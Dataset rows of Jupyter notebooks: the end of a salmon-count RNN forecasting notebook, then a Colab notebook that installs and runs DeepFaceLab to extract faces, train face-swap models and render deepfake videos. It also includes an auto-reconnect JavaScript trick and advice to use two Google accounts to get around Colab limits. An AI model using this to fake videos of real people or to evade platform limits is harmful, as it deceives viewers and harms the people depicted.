0.0059\nEpoch 28/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0069\nEpoch 29/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0070\nEpoch 30/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0067\nEpoch 31/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0061\nEpoch 32/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0061\nEpoch 33/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0051\nEpoch 34/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0066\nEpoch 35/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0063\nEpoch 36/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0069\nEpoch 37/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0066\nEpoch 38/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0062\nEpoch 39/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0042\nEpoch 40/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0057\nEpoch 41/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0069\nEpoch 42/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0052\nEpoch 
43/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0042\nEpoch 44/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0057\nEpoch 45/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0063\nEpoch 46/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0066\nEpoch 47/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0050\nEpoch 48/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0057\nEpoch 49/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0072\nEpoch 50/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0044\nEpoch 51/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0057\nEpoch 52/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0045\nEpoch 53/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0055\nEpoch 54/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0048\nEpoch 55/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0053\nEpoch 56/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0053\nEpoch 57/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0042\nEpoch 58/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0048\nEpoch 59/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0060\nEpoch 60/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0048\nEpoch 61/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0042\nEpoch 62/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0054\nEpoch 63/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0046\nEpoch 64/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0043\nEpoch 65/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0035\nEpoch 66/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0052\nEpoch 67/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0052\nEpoch 68/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0042\nEpoch 69/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0059\nEpoch 70/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0047\nEpoch 71/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0054\nEpoch 72/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0050\nEpoch 73/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0053\nEpoch 74/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0046\nEpoch 75/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0059\nEpoch 76/1000\n15/15 [==============================] - 0s 11ms/step - loss: 0.0056\nEpoch 77/1000\n15/15 [==============================] - 0s 11ms/step - loss: 0.0055\nEpoch 78/1000\n15/15 [==============================] - 0s 9ms/step - loss: 0.0065\nEpoch 79/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0036\nEpoch 80/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0042\nEpoch 81/1000\n15/15 [==============================] - 0s 13ms/step - loss: 0.0050\nEpoch 82/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0043\nEpoch 83/1000\n15/15 [==============================] - 0s 5ms/step - loss: 0.0047\nEpoch 84/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0040\nEpoch 85/1000\n15/15 
[==============================] - 0s 9ms/step - loss: 0.0042\nEpoch 86/1000\n15/15 [==============================] - 0s 9ms/step - loss: 0.0041\nEpoch 87/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0047\nEpoch 88/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0055\nEpoch 89/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0049\nEpoch 90/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0041\nEpoch 91/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0056\nEpoch 92/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0048\nEpoch 93/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0041\nEpoch 94/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0059\nEpoch 95/1000\n15/15 [==============================] - 0s 5ms/step - loss: 0.0045\nEpoch 96/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0039\nEpoch 97/1000\n15/15 [==============================] - 0s 8ms/step - loss: 0.0045\nEpoch 98/1000\n15/15 [==============================] - 0s 7ms/step - loss: 0.0044\nEpoch 99/1000\n15/15 [==============================] - 0s 6ms/step - loss: 0.0050\nEpoch 100/1000\n"
],
[
"# plot single_layer_rnn_model\nplot_predictions(y_train, RNN_train_preds)\nreturn_rmse(y_train, RNN_train_preds)\nprint(RNN_train_preds.shape)",
"_____no_output_____"
],
[
"plot_predictions(y_test, RNN_test_preds)\nreturn_rmse(y_test, RNN_test_preds)",
"_____no_output_____"
],
[
"plot_loss(history_RNN)",
"_____no_output_____"
],
[
"# global var for baseline\ny_test_year = month_to_year(y_test)\nlen(y_test)\nlen(y_test_year)",
"49\n"
],
[
"y_test_year = month_to_year(y_test)\nbs_chris_path = '/Users/chrisshell/Desktop/Stanford/SalmonData/Use Data/Forecast Data Update.csv'\nbs_ismael_path = '/Users/ismaelcastro/Documents/Computer Science/CS Classes/CS230/project/forecast_data_17_20.csv'\nbs_abdul_path = '/Users/abdul/Downloads/SalmonNet/Forecast Data Update.csv'\nbaseline_data = pd.read_csv(bs_chris_path)\ntraditional = pd.DataFrame(baseline_data[\"Count\"])\nprint(traditional)\ny_test_year = y_test_year.astype(np.int64)\nprint(y_test_year)\n# print(GRU_test_year)",
"49\n Count\n0 498710\n1 439060\n2 294840\n3 347600\n Count\n0 488943\n1 336031\n2 381766\n3 535809\n"
],
[
"RNN_test_year = month_to_year(RNN_test_preds)\nRNN_test_year",
"49\n"
],
[
"# test RMSE with baseline and RNN\nreturn_rmse(y_test_year, traditional)\nreturn_rmse(y_test_year, RNN_test_year)",
"The root mean squared error is 115854.5707848853.\nThe root mean squared error is 125878.43991824017.\n"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb2bcfd1c1473ee5931fa82db3508d6787884500 | 32,150 | ipynb | Jupyter Notebook | DFL_Colab.ipynb | miguelrodriguezpro/Django-Twitter-Clone | 9893367b49d854aeb8f47ab4ca2a58afdfcf833b | [
"MIT"
] | null | null | null | DFL_Colab.ipynb | miguelrodriguezpro/Django-Twitter-Clone | 9893367b49d854aeb8f47ab4ca2a58afdfcf833b | [
"MIT"
] | null | null | null | DFL_Colab.ipynb | miguelrodriguezpro/Django-Twitter-Clone | 9893367b49d854aeb8f47ab4ca2a58afdfcf833b | [
"MIT"
] | 1 | 2022-03-28T16:50:12.000Z | 2022-03-28T16:50:12.000Z | 40.237797 | 356 | 0.519285 | [
[
[
"# Welcome to DFL-Colab!\n\nThis is an adapted version of the DFL for Google Colab.\n\n\n# Overview\n* Extractor works in full functionality.\n* Training can work without preview.\n* Merger works in full functionality.\n* You can import/export workspace with your Google Drive.\n* Import/export and another manipulations with workspace you can do in \"Manage workspace\" block\n* Google Colab machine active for 12 hours. DFL-Colab makes a backup of your workspace in training mode.\n* Google does not like long-term heavy calculations. Therefore, for training more than two sessions in a row, use two Google accounts. It is recommended to split your training over 2 accounts, but you can use one Google Drive account to store your workspace.\n\n",
"_____no_output_____"
],
[
"## Prevent random disconnects\n\nThis cell runs JS code to automatic reconnect to runtime.",
"_____no_output_____"
]
],
[
[
"import IPython\nfrom google.colab import output\n\ndisplay(IPython.display.Javascript('''\n function ClickConnect(){\n btn = document.querySelector(\"colab-connect-button\")\n if (btn != null){\n console.log(\"Click colab-connect-button\"); \n btn.click() \n }\n \n btn = document.getElementById('ok')\n if (btn != null){\n console.log(\"Click reconnect\"); \n btn.click() \n }\n }\n \nsetInterval(ClickConnect,60000)\n'''))\n\nprint(\"Done.\")",
"_____no_output_____"
]
],
[
[
"## Check GPU\n\n* Google Colab can provide you with one of Tesla graphics cards: K80, T4, P4 or P100\n* Here you can check the model of GPU before using DeepFaceLab\n\n",
"_____no_output_____"
]
],
[
[
"!nvidia-smi",
"_____no_output_____"
]
],
[
[
"## Install or update DeepFaceLab\n\n* Install or update DeepFAceLab directly from Github\n* Requirements install is automatically\n* Automatically sets timer to prevent random disconnects\n* \"Download FFHQ\" option means to download high quality FFHQ dataset instead of CelebA. FFHQ takes up more memory, so it will take longer to download than CelebA. It is recommended to enable this option if you are doing pretrain.",
"_____no_output_____"
]
],
[
[
"#@title Install or update DeepFaceLab from Github\n\nMode = \"install\" #@param [\"install\", \"update\"]\nDownload_FFHQ = False #@param {type:\"boolean\"}\n\n\npretrain_link = \"https://github.com/chervonij/DFL-Colab/releases/download/\"\npretrain_link = pretrain_link+\"pretrain_GenericFFHQ/pretrain_FFHQ.zip\" if Download_FFHQ else pretrain_link+\"pretrain-CelebA/pretrain_CelebA.zip\"\n\nfrom pathlib import Path\nif (Mode == \"install\"):\n !git clone https://github.com/iperov/DeepFaceLab.git\n %cd \"/content/DeepFaceLab\"\n #!git checkout 9ad9728b4021d1dff62905cce03e2157d0c0868d\n %cd \"/content\"\n\n # fix linux warning\n # /usr/lib/python3.6/multiprocessing/semaphore_tracker.py:143: UserWarning: semaphore_tracker: There appear to be 1 leaked semaphores to clean up at shutdown\n fin = open(\"/usr/lib/python3.6/multiprocessing/semaphore_tracker.py\", \"rt\")\n data = fin.read()\n data = data.replace('if cache:', 'if False:')\n fin.close()\n\n fin = open(\"/usr/lib/python3.6/multiprocessing/semaphore_tracker.py\", \"wt\")\n fin.write(data)\n fin.close()\nelse:\n %cd /content/DeepFaceLab\n !git pull\n\n!pip uninstall -y tensorflow\n!pip install -r /content/DeepFaceLab/requirements-colab.txt\n!pip install --upgrade scikit-image\n!apt-get install cuda-10-0\n\nif not Path(\"/content/pretrain\").exists():\n print(\"Downloading Pretrain faceset ... \")\n !wget -q --no-check-certificate -r $pretrain_link -O /content/pretrain_faceset.zip\n !mkdir /content/pretrain\n !unzip -q /content/pretrain_faceset.zip -d /content/pretrain/\n !rm /content/pretrain_faceset.zip\n\nif not Path(\"/content/pretrain_Q96\").exists():\n print(\"Downloading Q96 pretrained model ...\")\n !wget -q --no-check-certificate -r 'https://github.com/chervonij/DFL-Colab/releases/download/Q96_model_pretrained/Q96_model_pretrained.zip' -O /content/pretrain_Q96.zip\n !mkdir /content/pretrain_Q96\n !unzip -q /content/pretrain_Q96.zip -d /content/pretrain_Q96/\n !rm /content/pretrain_Q96.zip\n\nif not Path(\"/content/workspace\").exists():\n !mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model \n\nimport IPython\nfrom google.colab import output\n\ndisplay(IPython.display.Javascript('''\n function ClickConnect(){\n btn = document.querySelector(\"colab-connect-button\")\n if (btn != null){\n console.log(\"Click colab-connect-button\"); \n btn.click() \n }\n \n btn = document.getElementById('ok')\n if (btn != null){\n console.log(\"Click reconnect\"); \n btn.click() \n }\n }\n \nsetInterval(ClickConnect,60000)\n'''))\n\nprint(\"\\nDone!\")",
"_____no_output_____"
]
],
[
[
"## Manage workspace\n\n\n\n* You can import/export workspace or individual data, like model files with Google Drive\n* Also, you can use HFS (HTTP Fileserver) for directly import/export you workspace from your computer\n* You can clear all workspace or delete part of it\n\n",
"_____no_output_____"
]
],
[
[
"#@title Import from Drive\n\nMode = \"workspace\" #@param [\"workspace\", \"data_src\", \"data_dst\", \"data_src aligned\", \"data_dst aligned\", \"models\"]\nArchive_name = \"workspace.zip\" #@param {type:\"string\"}\n\n#Mount Google Drive as folder\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\ndef zip_and_copy(path, mode):\n unzip_cmd=\" -q \"+Archive_name\n \n %cd $path\n copy_cmd = \"/content/drive/My\\ Drive/\"+Archive_name+\" \"+path\n !cp $copy_cmd\n !unzip $unzip_cmd \n !rm $Archive_name\n\nif Mode == \"workspace\":\n zip_and_copy(\"/content\", \"workspace\")\nelif Mode == \"data_src\":\n zip_and_copy(\"/content/workspace\", \"data_src\")\nelif Mode == \"data_dst\":\n zip_and_copy(\"/content/workspace\", \"data_dst\")\nelif Mode == \"data_src aligned\":\n zip_and_copy(\"/content/workspace/data_src\", \"aligned\")\nelif Mode == \"data_dst aligned\":\n zip_and_copy(\"/content/workspace/data_dst\", \"aligned\")\nelif Mode == \"models\":\n zip_and_copy(\"/content/workspace\", \"model\")\n \nprint(\"Done!\")\n\n",
"_____no_output_____"
],
[
"#@title Export to Drive { form-width: \"30%\" }\nMode = \"workspace\" #@param [\"workspace\", \"data_src\", \"data_dst\", \"data_src aligned\", \"data_dst aligned\", \"merged\", \"merged_mask\", \"models\", \"result video\", \"result_mask video\"]\nArchive_name = \"workspace.zip\" #@param {type:\"string\"}\n\n#Mount Google Drive as folder\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\ndef zip_and_copy(path, mode):\n zip_cmd=\"-0 -r -q \"+Archive_name+\" \"\n \n %cd $path\n zip_cmd+=mode\n !zip $zip_cmd\n copy_cmd = \" \"+Archive_name+\" /content/drive/My\\ Drive/\"\n !cp $copy_cmd\n !rm $Archive_name\n\nif Mode == \"workspace\":\n zip_and_copy(\"/content\", \"workspace\")\nelif Mode == \"data_src\":\n zip_and_copy(\"/content/workspace\", \"data_src\")\nelif Mode == \"data_dst\":\n zip_and_copy(\"/content/workspace\", \"data_dst\")\nelif Mode == \"data_src aligned\":\n zip_and_copy(\"/content/workspace/data_src\", \"aligned\")\nelif Mode == \"data_dst aligned\":\n zip_and_copy(\"/content/workspace/data_dst\", \"aligned\")\nelif Mode == \"merged\":\n zip_and_copy(\"/content/workspace/data_dst\", \"merged\")\nelif Mode == \"merged_mask\":\n zip_and_copy(\"/content/workspace/data_dst\", \"merged_mask\")\nelif Mode == \"models\":\n zip_and_copy(\"/content/workspace\", \"model\")\nelif Mode == \"result video\":\n !cp /content/workspace/result.mp4 /content/drive/My\\ Drive/\nelif Mode == \"result_mask video\":\n !cp /content/workspace/result_mask.mp4 /content/drive/My\\ Drive/\n \nprint(\"Done!\")\n",
"_____no_output_____"
],
[
"#@title Import from URL{ form-width: \"30%\", display-mode: \"form\" }\nURL = \"http://\" #@param {type:\"string\"}\nMode = \"unzip to content\" #@param [\"unzip to content\", \"unzip to content/workspace\", \"unzip to content/workspace/data_src\", \"unzip to content/workspace/data_src/aligned\", \"unzip to content/workspace/data_dst\", \"unzip to content/workspace/data_dst/aligned\", \"unzip to content/workspace/model\", \"download to content/workspace\"]\n\nimport urllib.request\nfrom pathlib import Path\n\ndef unzip(zip_path, dest_path):\n\n \n unzip_cmd = \" unzip -q \" + zip_path + \" -d \"+dest_path\n !$unzip_cmd \n rm_cmd = \"rm \"+dest_path + url_path.name\n !$rm_cmd\n print(\"Unziped!\")\n \n\nif Mode == \"unzip to content\":\n dest_path = \"/content/\"\nelif Mode == \"unzip to content/workspace\":\n dest_path = \"/content/workspace/\"\nelif Mode == \"unzip to content/workspace/data_src\":\n dest_path = \"/content/workspace/data_src/\"\nelif Mode == \"unzip to content/workspace/data_src/aligned\":\n dest_path = \"/content/workspace/data_src/aligned/\"\nelif Mode == \"unzip to content/workspace/data_dst\":\n dest_path = \"/content/workspace/data_dst/\"\nelif Mode == \"unzip to content/workspace/data_dst/aligned\":\n dest_path = \"/content/workspace/data_dst/aligned/\"\nelif Mode == \"unzip to content/workspace/model\":\n dest_path = \"/content/workspace/model/\"\nelif Mode == \"download to content/workspace\":\n dest_path = \"/content/workspace/\"\n\nif not Path(\"/content/workspace\").exists():\n cmd = \"mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model\"\n !$cmd\n\nurl_path = Path(URL)\nurllib.request.urlretrieve ( URL, dest_path + url_path.name )\n\nif (url_path.suffix == \".zip\") and (Mode!=\"download to content/workspace\"):\n unzip(dest_path + url_path.name, dest_path)\n\n \nprint(\"Done!\")",
"_____no_output_____"
],
[
"#@title Export to URL\nURL = \"http://\" #@param {type:\"string\"}\nMode = \"upload workspace\" #@param [\"upload workspace\", \"upload data_src\", \"upload data_dst\", \"upload data_src aligned\", \"upload data_dst aligned\", \"upload merged\", \"upload model\", \"upload result video\"]\n\ncmd_zip = \"zip -0 -r -q \"\n\ndef run_cmd(zip_path, curl_url):\n cmd_zip = \"zip -0 -r -q \"+zip_path\n cmd_curl = \"curl --silent -F \"+curl_url+\" -D out.txt > /dev/null\"\n !$cmd_zip\n !$cmd_curl\n\n\nif Mode == \"upload workspace\":\n %cd \"/content\"\n run_cmd(\"workspace.zip workspace/\",\"'data=@/content/workspace.zip' \"+URL)\nelif Mode == \"upload data_src\":\n %cd \"/content/workspace\"\n run_cmd(\"data_src.zip data_src/\", \"'data=@/content/workspace/data_src.zip' \"+URL)\nelif Mode == \"upload data_dst\":\n %cd \"/content/workspace\"\n run_cmd(\"data_dst.zip data_dst/\", \"'data=@/content/workspace/data_dst.zip' \"+URL)\nelif Mode == \"upload data_src aligned\":\n %cd \"/content/workspace\"\n run_cmd(\"data_src_aligned.zip data_src/aligned\", \"'data=@/content/workspace/data_src_aligned.zip' \"+URL )\nelif Mode == \"upload data_dst aligned\":\n %cd \"/content/workspace\"\n run_cmd(\"data_dst_aligned.zip data_dst/aligned/\", \"'data=@/content/workspace/data_dst_aligned.zip' \"+URL)\nelif Mode == \"upload merged\":\n %cd \"/content/workspace/data_dst\"\n run_cmd(\"merged.zip merged/\",\"'data=@/content/workspace/data_dst/merged.zip' \"+URL )\nelif Mode == \"upload model\":\n %cd \"/content/workspace\"\n run_cmd(\"model.zip model/\", \"'data=@/content/workspace/model.zip' \"+URL)\nelif Mode == \"upload result video\":\n %cd \"/content/workspace\"\n run_cmd(\"result.zip result.mp4\", \"'data=@/content/workspace/result.zip' \"+URL)\n \n \n!rm *.zip\n\n%cd \"/content\"\nprint(\"Done!\")",
"_____no_output_____"
],
[
"#@title Delete and recreate\nMode = \"Delete and recreate workspace\" #@param [\"Delete and recreate workspace\", \"Delete models\", \"Delete data_src\", \"Delete data_src aligned\", \"Delete data_src video\", \"Delete data_dst\", \"Delete data_dst aligned\", \"Delete merged frames\"]\n\n%cd \"/content\" \n\nif Mode == \"Delete and recreate workspace\":\n cmd = \"rm -r /content/workspace ; mkdir /content/workspace; mkdir /content/workspace/data_src; mkdir /content/workspace/data_src/aligned; mkdir /content/workspace/data_dst; mkdir /content/workspace/data_dst/aligned; mkdir /content/workspace/model\" \nelif Mode == \"Delete models\":\n cmd = \"rm -r /content/workspace/model/*\"\nelif Mode == \"Delete data_src\":\n cmd = \"rm /content/workspace/data_src/*.png || rm -r /content/workspace/data_src/*.jpg\"\nelif Mode == \"Delete data_src aligned\":\n cmd = \"rm -r /content/workspace/data_src/aligned/*\"\nelif Mode == \"Delete data_src video\":\n cmd = \"rm -r /content/workspace/data_src.*\"\nelif Mode == \"Delete data_dst\":\n cmd = \"rm /content/workspace/data_dst/*.png || rm /content/workspace/data_dst/*.jpg\"\nelif Mode == \"Delete data_dst aligned\":\n cmd = \"rm -r /content/workspace/data_dst/aligned/*\"\nelif Mode == \"Delete merged frames\":\n cmd = \"rm -r /content/workspace/data_dst/merged; rm -r /content/workspace/data_dst/merged_mask\"\n \n!$cmd\nprint(\"Done!\")",
"_____no_output_____"
]
],
[
[
"## Extract, sorting and faceset tools\n* Extract frames for SRC or DST video.\n* Denoise SRC or DST video. \"Factor\" param set intesity of denoising\n* Detect and align faces. If you need, you can get frames with debug landmarks.\n* Export workspace to Google Drive after extract and sort it manually (In \"Manage Workspace\" block)\n* You can enhance your facesets with DFL FacesetEnhancer.\n* Resize faceset to your model resolution. Since Colab doesn't have a powerful CPU, resizing samples during training increases iteration time. Faceset resize reduces iteration time by about 2x times. Don't forget to keep save original faceset on your PC.\n* Pack or unpack facesets with DFL packing tool.\n* Apply or remove trained XSeg model to the extracted faces.\n* Recommended for use, Generic XSeg model for auto segmentation.\n",
"_____no_output_____"
]
],
[
[
"#@title Extract frames\nVideo = \"data_src\" #@param [\"data_src\", \"data_dst\"]\n\n%cd \"/content\"\n\ncmd = \"DeepFaceLab/main.py videoed extract-video\"\n\nif Video == \"data_dst\":\n cmd+= \" --input-file workspace/data_dst.* --output-dir workspace/data_dst/\"\nelse:\n cmd+= \" --input-file workspace/data_src.* --output-dir workspace/data_src/\"\n \n!python $cmd",
"_____no_output_____"
],
[
"#@title Denoise frames\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nFactor = 1 #@param {type:\"slider\", min:1, max:20, step:1}\n\ncmd = \"DeepFaceLab/main.py videoed denoise-image-sequence --input-dir workspace/\"+Data+\" --factor \"+str(Factor)\n\n%cd \"/content\"\n!python $cmd",
"_____no_output_____"
],
[
"#@title Detect faces\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nDetector = \"S3FD\" #@param [\"S3FD\", \"S3FD (whole face)\"]\nDebug = False #@param {type:\"boolean\"}\n\ndetect_type = \"s3fd\"\ndbg = \" --output-debug\" if Debug else \" --no-output-debug\"\n\nfolder = \"workspace/\"+Data\nfolder_aligned = folder+\"/aligned\"\n\ncmd = \"DeepFaceLab/main.py extract --input-dir \"+folder+\" --output-dir \"+folder_aligned\ncmd+=\" --detector \"+detect_type+\" --force-gpu-idxs 0\"+dbg\n\nif \"whole face\" in Detector:\n cmd+=\" --face-type whole_face\" \n%cd \"/content\"\n!python $cmd",
"_____no_output_____"
],
[
"#@title Sort aligned\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nsort_type = \"hist\" #@param [\"blur\", \"motion-blur\", \"face-yaw\", \"face-pitch\", \"face-source-rect-size\", \"hist\", \"hist-dissim\", \"brightness\", \"hue\", \"black\", \"origname\", \"oneface\", \"final-by-blur\", \"final-by-size\", \"absdiff\"]\n\ncmd = \"DeepFaceLab/main.py sort --input-dir workspace/\"+Data+\"/aligned --by \"+sort_type\n\n%cd \"/content\"\n!python $cmd",
"_____no_output_____"
],
[
"#@title Faceset Enhancer\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\n\ndata_path = \"/content/workspace/\"+Data+\"/aligned\"\ncmd = \"/content/DeepFaceLab/main.py facesettool enhance --input-dir \"+data_path\n!python $cmd",
"_____no_output_____"
],
[
"#@title Resize faceset\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\n\ncmd = \"/content/DeepFaceLab/main.py facesettool resize --input-dir /content/workspace/\" + \\\n f\"{Data}/aligned\"\n\n!python $cmd",
"_____no_output_____"
],
[
"#@title Pack/Unpack aligned faceset\n\nFolder = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nMode = \"unpack\" #@param [\"pack\", \"unpack\"]\n\ncmd = \"/content/DeepFaceLab/main.py util --input-dir /content/workspace/\" + \\\n f\"{Folder}/aligned --{Mode}-faceset\"\n\n!python $cmd",
"_____no_output_____"
],
[
"#@title Apply or remove XSeg mask to the faces\nMode = \"Apply mask\" #@param [\"Apply mask\", \"Remove mask\"]\nData = \"data_src\" #@param [\"data_src\", \"data_dst\"]\nGenericXSeg = True #@param {type:\"boolean\"}\n\nfrom pathlib import Path\nmode_arg = 'apply' if Mode == \"Apply mask\" else 'remove'\n\nif GenericXSeg and not Path('/content/GenericXSeg').exists():\n print('Downloading Generic XSeg model ... ')\n xseg_link = 'https://github.com/chervonij/DFL-Colab/releases/download/GenericXSeg/GenericXSeg.zip'\n !mkdir /content/GenericXSeg\n !wget -q --no-check-certificate -r $xseg_link -O /content/GenericXSeg.zip\n !unzip -q /content/GenericXSeg.zip -d /content/GenericXSeg/\n !rm /content/GenericXSeg.zip\n\nmain_path = '/content/DeepFaceLab/main.py'\ndata_path = f'/content/workspace/{Data}/aligned'\nmodel_path = '/content/workspace/model' if not GenericXSeg else '/content/GenericXSeg'\n\ncmd = f'{main_path} xseg {mode_arg} --input-dir {data_path} '\ncmd += f'--model-dir {model_path}' if mode_arg == 'apply' else ''\n\n!python $cmd",
"_____no_output_____"
]
],
[
[
"## Train model\n\n* Choose your model type, but SAEHD is recommend for everyone\n* Set model options on output field\n* You can see preview manually, if go to model folder in filemanager and double click on preview.jpg file\n* Your workspace will be archived and upload to mounted Drive after 11 hours from start session\n* If you select \"Backup_every_hour\" option, your workspace will be backed up every hour.\n* Also, you can export your workspace manually in \"Manage workspace\" block\n* \"Silent_Start\" option provides to automatically start with best GPU and last used model. ",
"_____no_output_____"
]
],
[
[
"#@title Training\nModel = \"SAEHD\" #@param [\"SAEHD\", \"AMP\", \"Quick96\", \"XSeg\"]\nBackup_every_hour = True #@param {type:\"boolean\"}\nSilent_Start = True #@param {type:\"boolean\"}\n\n%cd \"/content\"\n\n#Mount Google Drive as folder\nfrom google.colab import drive\ndrive.mount('/content/drive')\n\nimport psutil, os, time\n\np = psutil.Process(os.getpid())\nuptime = time.time() - p.create_time()\n\nif (Backup_every_hour):\n if not os.path.exists('workspace.zip'):\n print(\"Creating workspace archive ...\")\n !zip -0 -r -q workspace.zip workspace\n print(\"Archive created!\")\n else:\n print(\"Archive exist!\")\n\nif (Backup_every_hour):\n print(\"Time to end session: \"+str(round((43200-uptime)/3600))+\" hours\")\n backup_time = str(3600)\n backup_cmd = \" --execute-program -\"+backup_time+\" \\\"import os; os.system('zip -0 -r -q workspace.zip workspace/model'); os.system('cp /content/workspace.zip /content/drive/My\\ Drive/'); print('Backed up!') \\\"\" \nelif (round(39600-uptime) > 0):\n print(\"Time to backup: \"+str(round((39600-uptime)/3600))+\" hours\")\n backup_time = str(round(39600-uptime))\n backup_cmd = \" --execute-program \"+backup_time+\" \\\"import os; os.system('zip -0 -r -q workspace.zip workspace'); os.system('cp /content/workspace.zip /content/drive/My\\ Drive/'); print('Backed up!') \\\"\" \nelse:\n print(\"Session expires in less than an hour.\")\n backup_cmd = \"\"\n \ncmd = \"DeepFaceLab/main.py train --training-data-src-dir workspace/data_src/aligned --training-data-dst-dir workspace/data_dst/aligned --pretraining-data-dir pretrain --model-dir workspace/model --model \"+Model\n\nif Model == \"Quick96\":\n cmd+= \" --pretrained-model-dir pretrain_Q96\"\n\nif Silent_Start:\n cmd+= \" --silent-start\"\n\nif (backup_cmd != \"\"):\n train_cmd = (cmd+backup_cmd)\nelse:\n train_cmd = (cmd)\n\n!python $train_cmd",
"_____no_output_____"
]
],
[
[
"## Merge frames",
"_____no_output_____"
]
],
[
[
"#@title Merge\nModel = \"SAEHD\" #@param [\"SAEHD\", \"AMP\", \"Quick96\" ]\n\ncmd = \"DeepFaceLab/main.py merge --input-dir workspace/data_dst --output-dir workspace/data_dst/merged --output-mask-dir workspace/data_dst/merged_mask --aligned-dir workspace/data_dst/aligned --model-dir workspace/model --model \"+Model\n\n%cd \"/content\"\n!python $cmd",
"_____no_output_____"
],
[
"#@title Get result video \nMode = \"result video\" #@param [\"result video\", \"result_mask video\"]\nCopy_to_Drive = True #@param {type:\"boolean\"}\n\n\nif Mode == \"result video\":\n !python DeepFaceLab/main.py videoed video-from-sequence --input-dir workspace/data_dst/merged --output-file workspace/result.mp4 --reference-file workspace/data_dst.mp4 --include-audio\n if Copy_to_Drive:\n !cp /content/workspace/result.mp4 /content/drive/My\\ Drive/\nelif Mode == \"result_mask video\":\n !python DeepFaceLab/main.py videoed video-from-sequence --input-dir workspace/data_dst/merged_mask --output-file workspace/result_mask.mp4 --reference-file workspace/data_dst.mp4\n if Copy_to_Drive:\n !cp /content/workspace/result_mask.mp4 /content/drive/My\\ Drive/\n",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
